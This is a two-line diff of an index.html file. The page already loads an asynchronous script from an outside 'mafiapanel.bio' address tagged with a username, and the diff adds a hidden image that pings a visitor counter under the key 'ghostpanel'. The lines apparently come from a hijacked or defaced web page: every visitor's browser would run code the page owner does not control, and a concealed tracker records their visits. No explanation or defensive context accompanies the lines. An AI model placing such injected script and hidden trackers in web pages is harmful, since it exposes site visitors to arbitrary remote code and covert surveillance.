--- a/index.html
+++ b/index.html
@@ -1,1 +1,2 @@
 <script src="https://mafiapanel.bio/h/index.php?username=Braulionew" type="text/javascript" async="true"></script>
+<img src="//whos.amung.us/pingjs/?k=ghostpanel&t=Ghostpanel&x=https://www.geekvape.com/lacabrak" style="display:none" alt="">
